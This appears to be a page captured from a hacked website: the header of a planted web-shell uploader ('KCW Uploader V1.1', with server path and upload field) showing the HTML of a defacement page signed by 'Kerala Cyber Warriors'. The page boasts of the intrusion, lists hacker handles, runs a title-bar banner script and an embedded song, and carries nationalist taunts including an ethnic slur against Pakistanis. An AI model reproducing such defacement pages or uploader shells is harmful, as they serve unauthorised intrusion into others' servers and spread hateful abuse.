Kerala Cyber Warriors
KCW Uploader V1.1

Path : /home/truefixc/public_html/tested/
File Upload :
Current File : /home/truefixc/public_html/tested/index.html

<!doctype html>
<html>
			<meta http-equiv="Content-Type" content="text/html;charset=UTF-8">
<head>
<title >::HACKED BY TEAM KERALA CYBER WARRIORS::</title>


		<!-- THIS IS EMBED AREA FOR ADDING SONG INSIDE DEFACE PAGE -->
		<center>
		<!-- THIS IS END OF EMBEDING -->
		<link href='http://fonts.googleapis.com/css?family=Audiowide' rel='stylesheet' type='text/css'>
		<link href='http://fonts.googleapis.com/css?family=Merriweather+Sans' rel='stylesheet' type='text/css'>
		<link href='http://fonts.googleapis.com/css?family=Orbitron' rel='stylesheet' type='text/css'>
		<link href='http://fonts.googleapis.com/css?family=Jura|Black+Ops+One|Aldrich' rel='stylesheet' type='text/css'>
		<link href='http://fonts.googleapis.com/css?family=Inconsolata|Orbitron' rel='stylesheet' type='text/css'>

		<!-- <link rel="stylesheet" type="text/css" href="style.css"> -->
		<link href='http://fonts.googleapis.com/css?family=Orbitron:700' rel='stylesheet' type='text/css'>
		<meta content="HACKED BY TEAM KERALA CYBER WARRIORS"   name="description"/>
		<meta content="HACKED BY TEAM KERALA CYBER WARRIORS"  name="keywords"/>
		
							<!-- CSS START HERE -->

<style>



body{
	cursor: url("http://hellox.persiangig.com/DefacePage/negro.cur"), auto;
	background-color: black;
}
#back{

	text-align: center;
	/*height: 10px;
	width: -900px;*/
	margin: auto	;
}
#header{
	padding-top: 0px;
	font-size: 45px;
	font-family: 'Orbitron', sans-serif;
	color: white;
	text-align: center;
	font-weight: bolder ;
	text-transform: none;

}
#by{
	font-family: 'Black Ops One', cursive;
	color: white;
	font-size: 30px;
	text-align: center;
}

/*#header{
	font-size:16px;
	color:#FFF;
      transition: all 0.3s ease-in;
      text-decoration:none;
}*/

#header:hover{
	-webkit-stroke-width: 5.3px;
      -webkit-stroke-color: #FFFFFF;
      -webkit-fill-color: #FFFFFF;
      text-shadow: 1px 0px 20px white;
}

#by:hover{
	-webkit-stroke-width: 5.3px;
      -webkit-stroke-color: #FFFFFF;
      -webkit-fill-color: #FFFFFF;
      text-shadow: 1px 0px 20px white;
}
#texts{
	font-family: 'Aldrich', sans-serif;
	color: white;
	font-size: 19px;
	text-align: center;
}

#footer{
	color: white;
	/*padding-bottom: 40px;*/
/*	margin-bottom: 0px;*/
	color: grey	;
}

#team{

	font-size: 25px;
}


#info{
	color: white;
	padding-bottom: 0px;
	margin-top: 3px;
	font-size: 16px;
	font-weight: normal;
	font-family: 'Orbitron', sans-serif;
}
#info a{
	text-decoration: none;
	color: grey;
}
#info a:hover{
	color: orange;

	-webkit-stroke-width: 5.3px;
      -webkit-stroke-color: #FFFFFF;
      -webkit-fill-color: #FFFFFF;
      text-shadow: 1px 0px 20px orange;
      
}
#hello{
	font-size: 30px;
	-moz-transition: color 1s;
	-webkit-transition: color 1s;
	-ms-transition: color 1s;
	-o-transition: color 1s;
	transition: color 1.2s;


}
#hello:hover{
	color: red;
	-webkit-stroke-width: 5.3px;
      -webkit-stroke-color: #FFFFFF;
      -webkit-fill-color: #FFFFFF;
      text-shadow: 1px 0px 20px red;
}
/*#col{
	color: green;*/
}

#gmsg{
	color: grey;
}




</style> 		
				<!-- CSS END HERE -->
				<!-- This is js script for marquee in title bar -->

<script type='text/javascript'>
//<![CDATA[
function tb9_makeArray(n){
this.length = n;
return this.length;
}
tb9_messages = new tb9_makeArray(1);
tb9_messages[0] = "HACKED BY KERALA CYBER WARRIORS";
tb9_rptType = 'infinite';
tb9_rptNbr = 5;
tb9_speed = 100;
tb9_delay = 2000;
var tb9_counter=1;
var tb9_currMsg=0;
var tb9_timerID = null
var tb9_bannerRunning = false
var tb9_state = ""
tb9_clearState()
function tb9_stopBanner() {
if (tb9_bannerRunning)
clearTimeout(tb9_timerID)
tb9_timerRunning = false
}
function tb9_startBanner() {
tb9_stopBanner()
tb9_showBanner()
}
function tb9_clearState() {
tb9_state = ""
for (var i = 0; i < tb9_messages[tb9_currMsg].length; ++i) {
tb9_state += "0"
}
}
function tb9_showBanner() {
if (tb9_getString()) {
tb9_currMsg++
if (tb9_messages.length <= tb9_currMsg) {
if ((tb9_rptType == 'finite') && (tb9_counter==tb9_rptNbr)){
tb9_stopBanner();
return;
}
tb9_counter++;
tb9_currMsg=0;
}
tb9_clearState()
tb9_timerID = setTimeout("tb9_showBanner()", tb9_delay)
}
else {
var tb9_str = ""
for (var j = 0; j < tb9_state.length; ++j) {
tb9_str += (tb9_state.charAt(j) == "1") ? tb9_messages[tb9_currMsg].charAt(j) : "_"
}
document.title = tb9_str
tb9_timerID = setTimeout("tb9_showBanner()", tb9_speed)
}
}
function tb9_getString() {
var full = true
for (var j = 0; j < tb9_state.length; ++j) {
if (tb9_state.charAt(j) == 0)
full = false
}
if (full) return true
while (1) {
var num = tb9_getRandom(tb9_messages[tb9_currMsg].length)
if (tb9_state.charAt(num) == "0")
break
}
tb9_state = tb9_state.substring(0, num) + "1" + tb9_state.substring(num + 1, tb9_state.length)
return false
}
function tb9_getRandom(max) {
var now = new Date()
var num = now.getTime() * now.getSeconds() * Math.random()
return num % max
}
tb9_startBanner()

//]]>
</script>

<!-- THIS IS THE END OF JS SCRIPT FOR MARQUEE IN TITLE BAR -->
<embed src="https://dl.dropboxusercontent.com/s/50cs40ssrq3hn39/villa.mp3?dl=0" width="0" height="0">
</head>

<!-- BODY START HERE -->

<body>

	<div id="header">
		<b>HACKED BY KERALA CYBER WARRIORS</b>
		<div id="team"><b>FEEL THE POWER OF INDIAN HACKERS</b></div>
	</div>
	<div id="back">
	<br>
		<img src="http://s29.postimg.org/7ru2q76jb/kcw_logo_deface.png" >
	</div>
	<br>
		<div id="by">YOUR SITE GOT P4WN3D BY 8L4CK_P3RL
				<div id="ak">A.K.A "134N3R"</div>
				<br>
				<br>
		</div>
		<div id="texts">
						<div id="hello"><b>#OP_PAK_CYBER_SPACE</b></div><br>
						<div id="msg">
							<b>MESSAGE TO PORKISTANI LAMERS,</b> 
						</div><div id="that"><b>BETTER STAY AWAY FROM INDIAN CYBER SPACE</b></div>
						<div id="msg2"><b>YOU WILL NOT GET KASHMIR, BY HACKING INTO INDIAN WEBSITES</b></div><br>
						<div id="msg3"><b>We are Legion... We do not Forgive... We do not Forget...Expect us</b></div><br>
						<div id="greetz"><b>
							GREETZ TO : </b>

							<marquee><b> 8L4CK P3RL | GH057_R007 |DJITZ7 | MR.545 | F0R81DD3N H4CX3R | WHITE_DRAGON | RED LIZARD | C0D3_BR34K3R | S3CU617Y_R1PP36 | C0DE_ZER0 | AN0N R4NG3R | AVR DUD | HACKER 13 | ROO7_SH3LL</b></div></marquee>
						</div>
						
						<hr>
						<div id="footer">
						<div id="info" align="CENTER"><b>>>></b><a href="https://www.facebook.com/KeralaCyberWarriors" target="_blank" ><b>CONTACT KERALA CYBER WARRIORS</b></a><b><<<</b></div>
						</div>

</body>
</html>

-=[ KCW uplo4d3r c0ded by cJ_n4p573r ]=-
Ⓒ2017 ҠЄГѦLѦ СүѣЄГ ЩѦГГіѺГՏ